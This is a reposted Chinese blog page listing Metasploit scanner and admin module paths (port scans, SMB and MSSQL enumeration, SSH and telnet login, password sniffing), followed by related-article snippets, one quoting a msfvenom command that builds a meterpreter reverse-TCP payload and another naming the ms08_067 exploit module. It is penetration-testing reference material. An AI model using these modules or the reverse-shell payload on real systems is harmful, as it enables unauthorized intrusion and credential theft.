Kali linux 2016.2(Rolling)里Metasploit的常用模块

最新推荐文章于 2025-03-07 23:24:27 发布
转载 最新推荐文章于 2025-03-07 23:24:27 发布 · 116 阅读 · 1
文章标签:

#操作系统 #运维 #网络

本文介绍了多种网络扫描技术,包括端口扫描(如ACK、FTP跳转、SYN、TCP等)、SMB扫描(如枚举用户、共享文件等)、MSSQL扫描、SMTP扫描、SNMP扫描、SSH扫描、Telnet扫描、TFTP扫描、FTP版本扫描、ARP扫描及UDP服务扫描等。此外还提到了VNC扫描和SNMP社区扫描。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

 

 

端口扫描

auxiliary/scanner/portscan
scanner/portscan/ack ACK防火墙扫描
scanner/portscan/ftpbounce FTP跳端口扫描
scanner/portscan/syn SYN端口扫描
scanner/portscan/tcp TCP端口扫描
scanner/portscan/xmas TCP”XMas”端口扫描

smb扫描

smb枚举auxiliary/scanner/smb/smb_enumusers
返回DCERPC信息auxiliary/scanner/smb/pipe_dcerpc_auditor
扫描SMB2协议auxiliary/scanner/smb/smb2
扫描smb共享文件auxiliary/scanner/smb/smb_enumshares
枚举系统上的用户auxiliary/scanner/smb/smb_enumusers
SMB登录auxiliary/scanner/smb/smb_login
SMB登录use windows/smb/psexec(通过md5值登录)
扫描组的用户auxiliary/scanner/smb/smb_lookupsid
扫描系统版本auxiliary/scanner/smb/smb_version

mssql扫描(端口tcp1433udp1434)

admin/mssql/mssql_enum MSSQL枚举
admin/mssql/mssql_exec MSSQL执行命令
admin/mssql/mssql_sql MSSQL查询
scanner/mssql/mssql_login MSSQL登陆工具
scanner/mssql/mssql_ping 测试MSSQL的存在和信息

另外还有一个mssql_payload的模块 利用使用的

smtp扫描

smtp枚举auxiliary/scanner/smtp/smtp_enum
扫描smtp版本auxiliary/scanner/smtp/smtp_version

snmp扫描

通过snmp扫描设备auxiliary/scanner/snmp/community

ssh扫描

ssh登录auxiliary/scanner/ssh/ssh_login
ssh公共密钥认证登录auxiliary/scanner/ssh/ssh_login_pubkey
扫描ssh版本测试auxiliary/scanner/ssh/ssh_version

telnet扫描

telnet登录auxiliary/scanner/telnet/telnet_login
扫描telnet版本auxiliary/scanner/telnet/telnet_version

tftp扫描

扫描tftp的文件auxiliary/scanner/tftp/tftpbrute

ftp版本扫描scanner/ftp/anonymous

ARP扫描

auxiliary/scanner/discovery/arp_sweep

扫描UDP服务的主机auxiliary/scanner/discovery/udp_probe
检测常用的UDP服务auxiliary/scanner/discovery/udp_sweep
sniffer密码auxiliary/sniffer/psnuffle
snmp扫描scanner/snmp/community
vnc扫描无认证扫描scanner/vnc/vnc_none_auth

 

后渗透阶段之基于MSF的内网主机探测(存活、端口、服务)
谢公子的博客
06-17 1万+
目录 主机存活探测 端口扫描 服务探测 当我们通过代理可以进入某内网,需要对内网主机的服务进行探测。我们就可以使用MSF面的内网主机探测模块了。 在这之前,先修改 /etc/proxychains.conf ,加入我们的代理。 然后 proxychains msfconsole启动MSF,这样,我们的MSF就可以探测内网主机了。 或者是在MSF面添加0.0.0.0/...
【转载】metasploit在内网渗透中的一些模块
weixin_30730151的博客
12-02 478
下面附上内网渗透中可能用得上的msf模块 scanner/portscan/syn SYN端口扫描scanner/portscan/tcp TCP端口扫描 auxiliary/scanner/smb/smb_login SMB登录测试扫描use windows/smb/psexec ...
内网渗透之MSF内网扫描
没有网络安全就没有国家安全
03-07 1129
内网渗透之MSF内网扫描
渗透之端口扫描
CP1024的博客
08-18 289
端口扫描 scapy UDP scan 端口关闭:ICMP port-unreachable 端口开放:没有回包 了解每一种基于UDP的应用层包结构很有帮助的 与三层相同的技术 误判 scapy sr1(IP(dst=“192.168.0.68”)/UDP(dport=53),timeout=1,verbose=1 TCP端口扫描 基于连接的协议 三次握手 隐蔽扫描 僵尸扫描 全连接扫描 所有的TCP扫描方式都是基于三次握手的变化来判断目标端口状态 隐蔽端口扫描 隐蔽扫描—syn 不
内网渗透 Metasploit(MSF)基础使用
Innocence_0的博客
03-09 1933
msfvenom 是 msf 生成 payload 的一个工具这要区分一下 EXP 与 Payload :EXP 是利用漏洞进行攻击动作,而 payload 是 EXP 执行成功后在目标内进行各种指令动作。除了可以将 payload 插入到 exp 面,也可以作为独立模块进行生成,需要用这个工具生成一个落地化的,类似于会话,可移植性各种操作Armitage 就是一款使用 Java 为 Metasploit 编写的有图形化操作界面的软件,通过它可以轻松的使用 Metasploit 对目标进行攻击。
Kali Linux 2024.4 QEMU AMD64镜像安装包
最新发布
05-03
内容概要:本文提供了一个大文件的下载链接,文件名为“kali-linux-2024.4-qemu-amd64.7z”,由于文件体积较大,故存储于百度网盘中。文中给出了具体的访问链接和提取码,并提醒读者将文件转存至自己的网盘以免丢失...
VirtualBox安装kaliLinux2016.2
12-20
### VirtualBox安装Kali Linux 2016.2详细步骤及注意事项 #### 一、前言 随着网络安全行业的快速发展,Kali Linux作为一款专为渗透测试和安全审计设计的操作系统,越来越受到人们的关注。本篇文章将详细介绍如何...
Kali Linux 2024.2
2301_76786857的博客
06-09 2556
Kali Linux 2024.2 的发布标志着这个基于 Debian 的高级渗透测试和安全审计 Linux 发行版的又一次重大更新。这次更新不仅强化了其在网络安全领域的领先地位,还为用户带来了许多新的功能和改进。作为安全专家和渗透测试人员的首选工具,Kali Linux 2024.2进一步优化了用户体验和系统性能,使得安全测试更加高效和可靠。
kali-linux-mate-2016.2-amd64.torrent
03-29
kali-linux-mate-2016.2-amd64.torrent 黑客 专用 系统 种子 内含大量专用工具。 通过本页面下载后的操作与本人无关!!!
Kali Linux 2022.1 Release下载.rar
02-16
Kali Linux 64-Bit (Installer) - 2.8G kali-linux-2022.1-installer-amd64.iso Kali Linux ARM64 (Installer) (For Apple M1) - 2.3G 网盘文件永久链接 kali-linux-2022.1-installer-arm64.iso Kali Linux VMware...
0x15.第十五课 MetaSploit实现内网存活telnet和http服务扫描.pdf
06-24
0x15.第十五课 MetaSploit实现内网存活telnet和http服务扫描.pdf
Metasploit MSF发现内网存活主机
qq_45951598的博客
04-27 1802
基于ARP发现内网存活主机 ARP简介: ARP,通过解析网路层地址来找寻数据链路层地址的一个在网络协议包中极其重要的网络传输协议。根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址 使用模块: use post/windows/gather/arp_scanner set SESSION 1 set RHOSTS 192.168.1.120-125 run ![在这插入图片描述](https:/
路由代理(msf、CobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2812
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行中输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
MFS 服务扫描与爆破
weixin_30585437的博客
03-20 405
MSF 服务发现 常用来发现局域网内,的常见服务,比如HTTP,FTP,TELNET等. MSF模块搜索: [root@localhost ~]# msfconsole msf5 > search scanner type:auxiliary msf5 > search scanner/http type:auxiliary // 搜索所有与HTTP相关的模块 发现HTT...
MSF内网渗透实战
hackzkaq的博客
05-17 4110
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
msf扫描服务器漏洞,并发现漏洞对系统的入侵
b312738566的博客
10-20 1891
学会利用扫描工具来扫描服务器的漏洞,并通过发现的漏洞对系统进行入侵,上传木马并远程控制服务器,学生通过实验感性认识黑客入侵。工具软件:metasploit、windows系统、木马启动Msfconsole。
MSF多层内网渗透全过程
include_voidmain的博客
08-16 2407
MSF多层内网渗透全过程
利用Metasploit Framework(msf)进行内网(域)渗透
初学者L_言的博客
07-03 6704
只要去往 192.168.47.0这个网段的数据都将通过 Session转发出去!!! 内网进行端口扫描:use auxiliary/scanner/portscan/tcp use exploit/windows/smb/ms08_067_netapi
Metasploit使用内网跳板, 扫描局域网主机
dianyan5615的博客
06-21 1234
  最近,拿到一台内网机器, 苦于无法使用nmap扫描改主机的内网, 所以才有此文   在跳板机子获取一定权限后,需要积极的向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的meterpreter后门,可以使系列的操作更容易。   使用Meterpreter内置的添加路由功能   获取路由信息 run get_local_subnets   ...
VirtualBox详述:安装Kali Linux 2016.2教程
本篇教程详细介绍了如何在VirtualBox虚拟化环境中安装Kali Linux 2016.2操作系统。VirtualBox是一款功能强大的开源虚拟机软件,以其轻量级、易用性著称,适合初学者和专业开发人员进行安全测试、开发环境搭建等需求...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值